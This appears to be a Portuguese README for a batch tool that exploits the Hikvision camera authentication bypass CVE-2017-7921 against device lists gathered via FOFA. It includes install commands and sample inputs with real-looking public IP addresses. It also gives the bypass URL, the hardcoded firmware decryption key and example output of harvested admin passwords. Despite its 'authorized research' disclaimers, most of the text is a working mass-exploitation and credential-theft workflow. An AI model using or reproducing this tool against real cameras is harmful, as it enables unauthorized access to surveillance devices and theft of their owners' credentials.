
Usado para testar rapidamente a vulnerabilidade CVE-2017-7921 da Hikvision com o auxílio do FOFA, além de fornecer a conta e a senha de login e gerar um arquivo JSON.
Aviso de segurança: esta ferramenta destina-se exclusivamente à pesquisa de segurança autorizada e à verificação de vulnerabilidades
Aviso importante: ao usar esta ferramenta, você concorda com os seguintes termos
Este projeto segue a política de pesquisa de segurança do GitHub e as normas de divulgação do Centro de Resposta de Segurança da Hikvision.
Ferramenta de detecção e verificação em lote para a vulnerabilidade de bypass de autenticação CVE-2017-7921 em câmeras IP Hikvision, com suporte à descriptografia automática de arquivos de configuração e extração de credenciais.
git clone https://github.com/[你的用户名]/CVE-2017-7921-Research-Toolkit.git
cd CVE-2017-7921-Research-Toolkit
pip install -r requirements.txt
requests>=2.28.0
pycryptodome>=3.15.0
tqdm>=4.64.0
Crie a pasta zc/ no diretório da ferramenta e coloque a lista de dispositivos em formato JSON (um objeto de dispositivo por linha):
mkdir zc
Exemplo de arquivo: devices_2025.json
{"city":"Lisbon","country":"PT","host":"109.50.152.186","link":"http://109.50.152.186:80"}
{"city":"Sao Paulo","country":"BR","host":"200.201.192.75","link":"http://200.201.192.75:8080"}
Descrição dos campos:
python batch_decrypt.py
════════════════════════════════════════════════════════════════════════════════
海康威视摄像头配置文件漏洞批量扫描工具
════════════════════════════════════════════════════════════════════════════════
可用的JSON文件:
════════════════════════════════════════════════════════════════════════════════
1. devices_2025.json (45,678 字节)
════════════════════════════════════════════════════════════════════════════════
请选择文件编号: 1
已选择文件: devices_2025.json
正在加载设备数据...
待扫描设备总数: 2000
请输入并发线程数 (默认: 5): 10
并发线程数: 10
开始扫描...
已扫描设备总数: 2000
发现漏洞设备数: 127
漏洞设备已保存到: vulnerable_devices.json
Após a conclusão da varredura, é gerado o arquivo vulnerable_devices.json, contendo informações de todos os dispositivos vulneráveis.
Exemplo de saída:
[
{
"url": "http://109.50.152.186",
"config_url": "http://109.50.152.186/System/configurationFile?auth=YWRtaW46MTEK",
"username": "admin",
"password": "123456",
"city": "Lisbon",
"country": "PT",
"org": "ISP Telecom",
"status": "success"
}
]
/System/configurationFile?auth=YWRtaW46MTEK usa credenciais codificadas (hardcoded)279977f62f6cfd2d91cd75b889ce0c9a está codificada no firmware0x73, 0x8B, 0x55, 0x44)Este software destina-se exclusivamente à pesquisa de segurança autorizada e a fins educacionais. Os usuários devem garantir a conformidade com todas as leis aplicáveis.
Última atualização: 2025-01-29 | Versão: v1.0.0 | CVE suportado: CVE-2017-7921
| Campo | Descrição | Obrigatório |
|---|
link | Endereço HTTP/HTTPS do dispositivo | ✅ Sim |
city | Informação da cidade | ❌ Não |
country | Código do país | ❌ Não |
org | Informação da organização/ISP | ❌ Não |